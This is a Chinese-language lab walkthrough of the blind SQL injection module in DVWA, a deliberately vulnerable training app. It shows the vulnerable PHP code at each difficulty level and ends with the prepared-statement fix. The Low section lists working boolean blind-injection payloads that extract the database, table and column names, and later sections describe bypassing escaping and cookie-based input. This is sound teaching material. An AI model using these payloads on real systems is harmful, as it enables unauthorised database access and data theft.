- XSS
- CSRF
- SSRF
- XXE
- SQL Injection
- File Upload
- 命令注入(Command Injection)
4、DVWA SQL Injection (Blind)分析与利用
### Low
漏洞代码:
```
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
```
直接拼接sql语句没有任何处理,查询结果只有 “User ID exists in the database.” 和 “User ID is MISSING from the database.”
漏洞利用:
1、判断注入是字符型还是数字型
输入:1' and 1=1;#
输出:User ID exists in the database.
输入:1' and 1=2;#
输出:User ID is MISSING from the database.
是字符型注入。
2、猜解当前数据库信息
猜解数据库长度:
1' and length(database())=4;#
数据库名的长度是4位。
使用二分法猜解数据库名:
1' and ascii(substr(database(),1,1)) > 100;#
User ID is MISSING from the database.
1' and ascii(substr(database(),1,1)) < 100;#
User ID is MISSING from the database.
判断出数据库名的第一个ascii字符为100,就是d,以此按照以上方法可以猜解出数据库名dvwa。
3、猜解表信息
猜解表数:
1' and (select count(table_name) from information_schema.tables where table_schema=database())=1; #
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2; #
判断出数据库中存在两个表
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9; #
判断出第一个表名的长度为9
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97; #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<110; #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100; #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103; #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103; #
判断出第一个表名的第一个字母是g
重复以上步骤,猜解出两个表名分别为 guestbook,users
4、猜解字段名
猜解字段的数量:
1' and (select count(column_name) from information_schema.columns where table_name='users')=8; #
输出:User ID exists in the database.
猜解字段名:
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7; #
可知users表中第一个字段长度是7位,使用上面的二分法可猜解出字段名。
........
### Medium
漏洞代码:
```
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
//mysql_close();
}
?>
```
后端使用了post获取ID,且前端使用了下拉来限制输入,使用burp抓包工具可以绕过。
mysqli_real_escape_string函数转义 x00,n,r,,’,”,x1a特殊字符,含有这些特殊字符的payload可以用16进制编码绕过。
### High
漏洞代码:
```
<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
```
后端使用了cookie获取ID,limit限制现实结果只有1个,rand函数扰乱基于时间的盲注。
使用burp修改cookie参数中的ID值为payload注入,加入#字符注释limit即可绕过限制结果为1的问题。
### Impossible
漏洞代码:
```
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
// Get results
if( $data->rowCount() == 1 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
```
checkToken防止csrf漏洞,
PDO使得数据和代码分离,保证了安全性。
⋮
问答
其他问答
暂无记录
笔记
{{ item.create_date_fmt }}
{{item.is_public == 1 ?"已公开":"未公开"}}
笔记审核中
收起
删除
编辑
{{ item.likes }}
{{ item.likes }}
采集
已采集
资料下载
暂无记录
作业
暂无记录
